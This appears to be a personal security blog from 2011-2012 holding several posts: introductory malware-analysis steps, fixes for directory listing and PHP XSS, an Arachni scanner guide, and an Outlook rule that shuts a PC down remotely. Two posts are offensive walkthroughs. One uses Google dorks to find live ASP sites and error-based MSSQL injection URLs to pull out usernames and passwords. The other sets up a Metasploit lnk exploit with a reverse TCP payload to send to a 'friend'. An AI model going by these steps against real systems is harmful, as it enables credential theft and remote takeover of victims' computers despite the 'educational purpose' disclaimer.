Tuesday, May 22, 2012

Basic Information Gathering of Analysis on Malware (Part 1)


Basic Information Gathering of Analysis on Malware (Part 1)
--------------------------------------------------------------------
Malware (spyware,Rootkits,worms,trojans,virus etc.), a malicious software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.

The first thing you do when your system is infected is scan with some antivirus softwares and anti malwares and so on , This tut shows how to analyse
it and bring out its functionality . This first thing we are doing here is info gathering of analysis of malware , its the first basic part to start with and go on advanced depending on the complexity of malware.

We have 2 types of Analysis Static and Dynamic.
Static :- Analyzing code or structure of program.
Dynamic:- Actually running the program to see wat its doing.

Note:
-----
This tut is not on advanced part of analyzing malware or disassembly . Hope if my study goes on learning advanced things will be first to post here... :)

note 2:
-------
first go through PE (portable executable) file format and structure. basically PE contains inofrmation necessary for windows os loader.
for analyzing we need actually to concentrate on PE file header which includes information about code ,type of application , required library functions and space requirements. And know about dll and its functions (import and export funstions).

Basic info Gathering of Static Analysis:
----------------------------------------

Now lets take a malware ... 

or create urself a trojan 

malware is uniquely identified by a hash.The malicious software is run through hashing program that produces hash which produces a hash that identifies a malware.

to fingerprint it we use a tool called md5deep there are other tools also.

usage: md5deep 123.exe (malware file name).



in the above screen shot u see a hash this hash can be used to search online to see if its already been identified.

Now here comes the problem u donno that the malware is packed or not.beacuse wen its packed , it becomes difficult to analysor detect it.
its normally packed with some kind of wrapper program . to identify or detect with wat packer that this malware has been packed we use tool called...

PEiD



from this we can know its packed with upx paker.

to unpack it there's program called upx (you will get it in sourceforge.net)
to unpack usage :  upx -d filename.exe


now its been unpacked.

now the next step goes like we ned to see that what kind of linked functions (loading dlls)its using. 

we have tool called dependency walker. now load the file on it (see below)


1.)here in right pane u can observe many dll's u its the dll's u imported
2.)imported functions
3.)when malware imports function by ordinal you can find which function is being imported by looking at ordinal value.
4.)additional info about the dll tat would be load if you run the program.

A common trojan or keylogger has interesting dll and fuctions will have like

Kernel32.dll: user32.dll  GDI32.dll,Shell32.dll,Advapi32.dll etc.
------------- -----------
(functions) Setwindowshookexw
CreateFilew Registerclassexw
findfirstfilew registerhotkey
findnextfilew setwindoetextw
etc .......... etc......

)Kernel32 tells us that software can create and manipulate process.here above findnextfile and firstfile functions
which are interesting as we can search through directories.

)User32.dll has function like setwindowhook is commonly used in spyware and keyloggers.
)GDI32 is for graphics related tat program probably has GUI 
)shell32 can lauch other programs
)Advapi32 uses the registry.


As we said that to take a look at PE headers 

We have sections in PE file like:
.text (contains executable code) , .rdata(holds read only data), .data(global data throughout) , .rsrc (resources needed by executable
.idata(stores important function information & if not present it will be in rdata) , .reloc (info. for relocation of library files) etc...

we have a tool called PEview (see below)


u can observe the machine info and time stamp when it wa compiled which is useful.
we can ingnore the DOS_Header and signature.
Image_Optinal_Header includes important information and has subsystem ,which shows there is console or GUI program.
Image_Section_Header also contains important info.These are used to describe each section in PE file.Sections cn be consistent
from exe to other exe files.



here u can observer on thing is the .data section is that
virtual size is much large than raw data size (u can ignore if there is small difference)
this alone will not tell its suspicious. it is likely unpacked.

{{Continued with Basic info gathering of Dynamic Analysis. sooon }}




Wednesday, May 16, 2012

Disable Directory Listing

Mostly you observe this directory listing in many websites :

Ex:  www.demo.com/

like traversing direcotries trying www.demo.com/images/
there is a possibilty that an attacker tries to look for hidden directories and there is possibility
of finding possible web confg files too.

to disable this

In Apache:
---------------
goto file called httpd.conf

and search for:


 Options Indexes FollowSymLinks 


now just add ' - ' before indexes like :

Options -Indexes FollowSymLinks 



In IIS 7:
----------
Open IIS manager and go to the level or navigate to manage.
then in  "Feature view" .  Double-click " Directory browsing "

In  " Actions " pane click Disable if directory browsing is enabled.

Sunday, April 22, 2012

Preventing XSS (PHP)

Lets take an example :


<html>

<body>

<form action="xss.php" method="POST">

Val: <input type="text" name="val">
<input type="submit" name="valu" value="submit">
</form>
</body>
</html>

<?php

$val=$_POST['val'];
if ($_POST['valu']=='submit')
{
echo $val;
}
?>


Here u can see that when we try to enter a value it directly echo's back to us..see below:



and when i try to enter the below html code ..it is running the script.


from this we know that it runs .. so lets now try to run a javscript
<script>alert("xss")</script>












Now to prevent this we use html function called "htmlentities".

now the code will be:


<?php

$val=htmlentities($_POST['val'],ENT_QUOTES,'UTF-8');
if ($_POST['valu']=='submit')
{
echo $val;
}
?>

now try to run the script :: it doesnt gets executed.... :)







cheers!..  




Monday, January 9, 2012

Arachni Web scanner (CLI & WEB GUI)


Download the CDE package from:

https://github.com/Zapotek/arachni/downloads


Linux users enjoy the privilege of a CDE package which is a compressed archive and contains a full preconfigured Linux environment in the form of a sandbox.

Quick Basic Usage  of Arachni:

To see help type :


$ arachni -h

You can check the options here.



You can simply run Arachni like:

$ arachni http://test.com
 
which will load all modules, the plugins under
 
/plugins/defaults
and audit all forms, links and cookies.

In the following example all modules will be run against http://site.com, auditing links/forms/cookies and following subdomains —with verbose output enabled.

The results of the audit will be saved in the the file site.com.afr.

$ arachni -fv http://site.com --report=afr:outfile=site.com.afr
 
 You can do module loading by following commands using wildcard.:


To load all xss modules using a wildcard:

$ arachni http://example.net --mods=xss_*

To load all audit modules using a wildcard:
$ arachni http://example.net --mods=audit*

To exclude only the csrf module:
$ arachni http://example.net --mods=*,-csrf

Or you can mix and match; to run everything but the xss modules:
$ arachni http://example.net --mods=*,-xss_*
 

Performing a full scan quickly

The full profile adds header auditing to the defaults.

 You can use it like:
$ arachni --load-profile=profiles/full.afp http://site.net
 
You have lots of options/flags/modes to explore here 
based on ur usage. 


for example we have Debug mode :


When this flag is enabled the system will output a lot of messages detailing what’s happening internally.
If you don’t want to be flooded by annoying and obscure messages you can pipe debugging output to a separate file when running Arachni using:

$ arachni -pv --mods=xss http://localhost/~zapotek/tests/forms/xss.php --debug
 
The debug.log file will contain something like:
 

 

Arachni WEB UI

now unzip it ,goto the folder location you will find the arachni console and web UI

There are two ways to start WEB UI :

just type in shell prompt :
 
$ arachni_web_autostart


This will setup a local Dispatcher, the WebUI server and even open up your browser.

or


Start a Dispatcher like:
$ arachni_rpcd 
 
Then start the WebUI by running:
$ arachni_web
 
And finally open up a browser window and visit: http://localhost:4567/ 

The WebUI supports HTTP Basic auth which you can configure using the Username and Password 
 
The WebUI can serve many purposes ranging from just a simple way to use Arachni to a Grid construction and management interface.
You can use it to perform and monitor a single scan, hassle-free, via any web-browser enabled device or use it to setup a worldwide High Performance Grid of Arachni scanners ready to combine their resources in order to perform lightning fast audits.
 
The first page, so eloquently entitled ‘Start a scan’, allows you to do just that.

A single scan can be performed easily enough, you just select a Dispatcher, enter the URL of your target and hit ‘Launch Scan’.



A high performance scan utilizes more than one Arachni Instance to perform the audit.

The master instance will perform the crawl and then calculate and distribute the workload amongst its slaves.
This allows scan-time to be severely decreased.

Once you have set up a Grid (i.e. configured at least 2 Dispatchers to have each other as neighbours) the “Start a scan” screen will change to this:



Modules and Plug-ins

The Modules and Plug-ins pages are pretty self-explanatory, they simply allow you to select which components to load.

Settings

Nothing special, these options have the same effects as their CLI(Command Line Interface) counterparts.

Reports

This page contains a list of audit reports along with the option to convert them to a fair amount of different formats.


Log

Not much to add to this, the name says it all:


Shutdown

You can kill the WebUI by sending Ctrl+C to the console from which you started it.

:)...:)


How To Shutdown A Computer With A Cell Phone

First you need to create a batch file to perform shutdown etc .you can write them down yourself.

* Open your notepad and type the following

EX: c:\windows\system32\shutdown -s -f -t 00
or
 shutdown -s -t 10 -c “shutting down”
And save it as shutdown.bat (Executable file)
----
Now open up Microsoft Outlook. I am assuming that you have already configured it for your Email . Now we will need to make it so that Outlook checks your inbox about every minute.

You can do this by going to Tools->Options. Then click on Mail Setup tab, and then, the Send/Receive button.

----
Make sure that the Schedule an automatic send/receive every… box is checked, and set the number of minutes to 1 or anytime you may like. Now you may close all of these dialog boxes.



Now go to Tools-->Rules and Alerts. Click on E-mail Rules tab. In new window select Check messages when they arrive and click Next.


Now in next page, check on, on this machine only and with specific words in the subject.
After checking these two values, click on specific words underlined.


 Search Text window will open, in the input field type the command that shuts down the PC. You can use any commands. For prevention of accidental execution I kept %shutdown% as a command. Click on Add button after you are done and click on OK.


Now click on Next.
In the next window check mark on start application. In the lower screen, click on application link.


 Now you’ll be welcomed to your familiar file open window. Load all files. And select the batch file that you’ve created to shutdown your PC.

Click on Next, again click on next (don’t choose any things in this step). And finally click on Finish button.


You’ll have %shutdown% alert shown in the E-mail Rules tab.


Now, when you send a message from your phone to your e-mail address with the Subject  %shutdown% your computer will trigger shutdown.bat file and instantly executes the command in that batch file finally leading to shutdown the PC.


:)


Thursday, November 3, 2011

MSSQL Injection


MSSQL Injection

Ex: google dork
inurl:.asp?id=
find a result like :
http://www.somesite.com/some.asp?ID=12
Now to check if it is vuln or not

insert single quotation ' at the last :
http://www.somesite.com/some.asp?ID=12’
you get error like this:
-------------------------------------------------
Error:Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/some.asp, line 86      
-------------------------------------------------
Then you can proceed

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,system_user)

(* here you can observe that we are trying to convert but it doesn’t happen which inturn shows the db name that it cant convert into int).

So it shows error , by showing the db name  like:
--------------------------------------------------
Error: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'usr' to a column of data type int.
/some.asp, line 86
---------------------------------------------------------------
In the error it shows some db name as “usr” .
Now
We try to bring all the available tables in a database :

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables))
(here information_schema is the database , this you can find in myphp).
We get error like :
----------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Error: Syntax error converting the nvarchar value 'galery' to a column of data type int.
/some.asp, line 86
-----------------------------------------------

(here table name is galery)

But no login credentials will be in the galery table ,To find the Second table name

http://www.somesite.com/some.asp?ID=12+and+1=convert(int,select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('galery')))

we get table name as users
now to find columns in users table:

http://www.somesite.com/site.asp?ID=12+and+1=convert(int,select+top+1+column_name+from+information_schema.columns+where+table_name='users'))

we get this

-----------------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Error: Syntax error converting the nvarchar value 'username' to a column of data type int.
/some.asp, line 86
-----------------------------------------------
To find second column folow the above step like finding the second table name
Now we need to find the values in the table with columns username and password

http://www.somesite.com/some.asp?ID=12 and+1=convert(int,(select+top+1+username+from+users))
 same as like for finding value in password field too.
Got it.?

[ * Warning : Im not responsible for your actions , this is for educational purpose only . ]

Tuesday, October 25, 2011

Windows lnk Exploit


Hack the system using the windows lnk exploit:

Update metasploit.
Goto the prompt and goto framework

Then type:

#./msfconsole

Msf>prompt opens..

The search for the exploit windows lnk.

Msf>search lnk

Then it shows the exploit

exploit/xxxxx/xxxxxr/xxxxx_dllloader

then type:
msf>use exploitname(type above exploit)

set SRVHOST  tat is your local ip to get conection back
.
Then set payload

Shell/reverse_tcp payload works mostly

so type:

msf>set payload windows/metxxxxx/xxx_tcp
then set LHOST as your local ip

then type:

msf>exploit

you will be shown a url or address with port number..give it to ur friend
tada !
wait for the reverse connection.
---------------------------------------------------
Warning: Im not responsible for ur actions , just for educational purpose only

Twitter Delicious Facebook Digg Stumbleupon Favorites More